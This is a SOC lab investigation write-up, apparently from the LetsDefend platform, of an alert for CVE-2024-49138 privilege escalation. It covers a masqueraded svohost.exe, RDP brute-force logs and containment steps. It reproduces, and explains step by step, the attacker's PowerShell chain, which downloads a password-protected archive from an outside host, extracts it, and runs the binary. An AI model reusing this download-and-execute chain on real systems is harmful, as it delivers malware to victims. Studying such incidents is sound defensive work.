LetsDefend SOC335 – CVE-2024-49138 Privilege Escalation Exploitation Analysis
Alert Name: SOC335 – CVE-2024-49138 Exploitation Detected
Severity: High
Event ID: 313
Event Time: Jan 22, 2025, 02:37 AM
Category: Privilege Escalation
Base Information#
| Field | Value |
|---|---|
| Event ID | 313 |
| Event Time | Jan 22, 2025, 02:37 AM |
| Rule | SOC335 – CVE-2024-49138 Exploitation Detected |
| Analyst Level | Security Analyst |
| Hostname | Victor |
| IP Address | 172.16.17.207 |
| Process Name | svohost.exe |
| Process Path | C:\temp\service_installer\svohost.exe |
| Process ID | 7640 |
| Parent Process | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| Command Line | ??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
| File Hash (SHA-256) | b432dcf4a0f0b601b1d79848467137a5e25cab5a0b7b1224be9d3b6540122db9 |
| Process User | EC2AMAZ-ILGVOIN\LetsDefend |
| Trigger Reason | Suspicious behavior patterns linked to CVE-2024-49138 |
| Device Action | Allowed |
Incident Details#
| Field | Value |
|---|---|
| Incident Name | EventID 313 – SOC335 CVE-2024-49138 Exploitation |
| Incident Type | Privilege Escalation |
| Created Date | Jan 08, 2026, 09:12 AM |
Pre-Investigation Notes#
- Date: Jan 22, 2025, 02:37 AM
- Hostname: Victor
- IP Address: 172.16.17.207
- Process Name: svohost.exe
- Process ID: 7640
- File Hash: b432dcf4a0f0b601b1d79848467137a5e25cab5a0b7b1224be9d3b6540122db9
- User: EC2AMAZ-ILGVOIN\LetsDefend
Play Book#
The process name is suspicious because it closely mimics svchost.exe by replacing one character, a common masquerading technique used by malware to blend in with legitimate Windows processes.
Check if the malware is quarantined or cleaned
| Field | Value |
|---|---|
| Type | OS |
| Source Address | 185.107.56.141 |
| Source Port | 0 |
| Destination Address | 172.16.17.207 |
| Destination Port | 0 |
| Time | Jan 22, 2025, 02:35 PM |
| Username | Victor |
| Event ID | 4624 |
| Logon Type | 10 (RemoteInteractive) |
| Source IP | 185.107.56.141 |
Malware Analysis#
VirusTotal analysis confirms the file is highly suspicious based on community detections and behavioral indicators.
YARA Signature Match – THOR APT Scanner
Rule: SUSP_HKTL_Gen_Pattern_Feb25_2
Rule Set: Livehunt – Hacktools Indicators
Description: Generic hacktool behavior pattern
Detection Ratio: 51 / 74 engines
Hybrid Analysis reports indicate the executable behaves like a service installer abuse tool commonly used during privilege escalation attacks.
Command and Control Activity Review#
Multiple authentication attempts were observed from the same external IP address prior to successful access.
Failed Login Attempts (Event ID 4625)
| Time | Username | Source IP | Destination IP | Error Code | Description |
|---|---|---|---|---|---|
| Jan 22, 2025, 02:35 PM | admin | 185.107.56.141 | 172.16.17.207 | 0xC000006D | Invalid credentials |
| Jan 22, 2025, 02:35 PM | admin | 185.107.56.141 | 172.16.17.207 | 0xC000006D | Invalid credentials |
| Jan 22, 2025, 02:35 PM | guest | 185.107.56.141 | 172.16.17.207 | 0xC000006D | Invalid credentials |
| Jan 22, 2025, 02:35 PM | guest | 185.107.56.141 | 172.16.17.207 | 0xC000006D | Invalid credentials |
Successful Login (Event ID 4624)
| Time | Username | Source IP | Destination IP | Logon Type | Description |
|---|---|---|---|---|---|
| Jan 22, 2025, 02:35 PM | Victor | 185.107.56.141 | 172.16.17.207 | 10 | Successful RDP login |

Containment Actions#
- User account was contained for further investigation
- Host activity monitoring was enabled
- Malicious process execution was blocked
Observed Execution Chain
powershell.exe downloaded and extracted a password-protected archive and executed the masqueraded binary from a temporary directory.
PowerShell command used:
$url = 'https://files-ld.s3.us-east-2.amazonaws.com/service-installer.zip'
$dest = 'C:\temp\service-installer.zip'
$extractPath = 'C:\temp'
$password = 'infected'
Invoke-WebRequest -Uri $url -OutFile $dest
7z.exe x -pinfected -oC:\temp service-installer.zip
C:\temp\service_installer\svohost.exe
Defines a download URL
$urlpoints to a ZIP file hosted online (service-installer.zip).Sets where the file will be saved $dest is the local path where the ZIP file will be downloaded: C:\temp\service-installer.zip
Defines the extraction directory $extractPath is set to C:\temp, where the contents of the ZIP will be unpacked.
Defines the ZIP password $password = ‘infected’ Password-protected ZIP files are commonly used to evade antivirus scanning during download.
Downloads the ZIP file Invoke-WebRequest -Uri $url -OutFile $dest This pulls the ZIP archive from the remote server and saves it locally.
Extracts the ZIP using 7-Zip
7z.exe x -pinfected -oC:\temp service-installer.zip x → extract files -p infected → use the password -oC:\temp → output directory This unpacks the archive into C:\temp.
- Executes the extracted binary C:\temp\service_installer\svohost.exe This directly runs the executable after extraction.
Impact Assessment#
- Privilege escalation: Confirmed
- Host compromise: Partial
- Persistence risk: High
- Lateral movement: Not observed
- Data exposure: Unknown
Recommended Actions#
- Immediately isolate the affected endpoint
- Reset credentials associated with the compromised user
- Remove all artifacts related to the malicious installer
- Patch systems vulnerable to CVE-2024-49138
- Enable enhanced logging and EDR protections
- Monitor for similar masquerading techniques across the environment
Final Verdict#
True Positive – Confirmed Privilege Escalation Exploitation
The alert represents a successful exploitation attempt leveraging a disguised service binary associated with CVE-2024-49138. Immediate remediation and system hardening are required.
Analyst Note#
The investigation confirmed the execution of a malicious binary impersonating a legitimate Windows service process. The activity originated from an external IP address, involved multiple failed authentication attempts, and resulted in a successful RDP login followed by malicious process execution. Evidence supports a confirmed privilege escalation scenario with a high risk of persistence if not remediated.
